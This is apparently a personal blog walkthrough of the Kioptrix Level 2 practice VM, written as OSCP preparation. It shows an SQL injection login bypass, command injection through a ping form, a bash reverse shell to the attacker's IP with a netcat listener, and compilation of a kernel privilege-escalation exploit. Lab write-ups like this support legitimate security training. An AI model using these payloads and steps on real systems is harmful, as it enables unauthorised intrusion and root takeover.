Kioptrix Level 1.1(Kioptrix level 2) -Walkthrough . My Path To OSCP

This is the 2nd blog post about my preparation for OSCP that I’m practicing from TJnull Vulnhub VM List . You can check out the full VM list here .

Let’s Begin :

First import the VM with your favorite virtualization software , and get the ip address of the VM . You can get the VM from here . If you face any problem in getting the IP address then assign a new network adapter to the Kioptrix VM and after that remove the first network adapter . Now if you need help for the command to know the ip address of the VM check my first blog post here .

Now that we got our ip and VM is up and running let’s start with reconnaissance .

Reconnaissance

Let’s start with a nmap scan . We will do it @ippsec style.

sudo nmap -sC -sV -oA nmap/kioptrix2 192.168.28.130

• -sC : For the default script
• -sV : For the version detection
• -oA : For out put in all format into path nmap/kioptrix2

We got bunch of ports open .

• 22/tcp(SSH)
• 80/tcp(HTTP)
• 443/tcp(HTTPs)
• 3306/tcp(mysql)

Now that we got some information let’s do enumeration .

Enumeration

Let’s start with ssh . I searched for any exploit available for the version i.e. openssh 3.9p1 . I got a exploit db link which you can find here . But that was of not much help . And also for the apache version no such helpful exploit found.

Now it’s time to enumerate the web page. First let’s do a quick nikto and gobuster direcotry scan .

gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://192.168.28.130 -t 10 -x php,txt,html

• dir : For directory searching
• -w : For wordlist path
• -u : For url
• -t : For thread count
• -x : For adding extensions in word

And there is nothing much interesting from the scans .

Now let’s browse through the web page .

We got a simple login page . Try with a simple login of admin , admin and intercept the traffic with burp .

And it is not showing any error for the request but we found something in the comment that it could be logged by administrator . Now let’s check if we can perform SQL injection . For username we use admin’# and for password some random string .

And it worked , now we are redirected to another page . Here I have done it manually but you can use sqlmap to perform this task .

Now the new page has a feature of ping , let’s check it out that with google.com in the box .

And it is performing the ping operation . Now we can check if it can add a new command with the ping command . Let’s check if the bash is available or not with whereis command .

And it worked , we got localhost ping with whereis bash command . so in the next step we can execute a reverse shell command and get the shell . Here I’m performing the reverse shell with bash but you can choose any reverse shell but before doing anything check that it is available in victim machine .

let’s do a reverse shell with bash . You can check the pentest monkey reverse shell cheat sheet here .

Just change the ip and port number in the reverse shell command and start the netcat listener in our kali machine .

• bash reverse shell : bash -i >& /dev/tcp/192.168.28.128/4444 0>&1
• netcat listener : nc -nlvp 4444

Now we got a reverse shell with user apache . The next step is to do the privilege escalation and get the root user .

Privilege Escalation

Let’s check it’s OS and kernel version.

It is running on centos 4.5 final with kernel version 2.6.9 and x86 OS. Now Let’s do a quick searchsploit before googling it .

Now import the exploit to our machine and send it to kioptrix VM . We will use simple python server for this task .

python3 -m http.server 9000

We got a permission denied in main path but it worked in tmp path . Now it’s time to compile the exploit and run it .

And here we got a root shell . You can compile the code in your machine and send it to victim machine . But check for any compatibility error like this exploit , this exploit was compatible for x86 but my kali machine is x64 based machine so I have to pass -m32 flag in gcc command . And also check for missing libraries .

gcc -m32 -o privesc 9542.c

For this missing library(#include<bits/libc-header-start.h>) you have to install gcc-multilib . And it will fix the issue .

sudo apt-get install gcc-multilib

Key Learning From this BOX :

• Before performing any brute force for login check for some SQL injection .
• If wget command showing saving issue check tmp or any other directory .
• Always check the exploit compatibility before running it .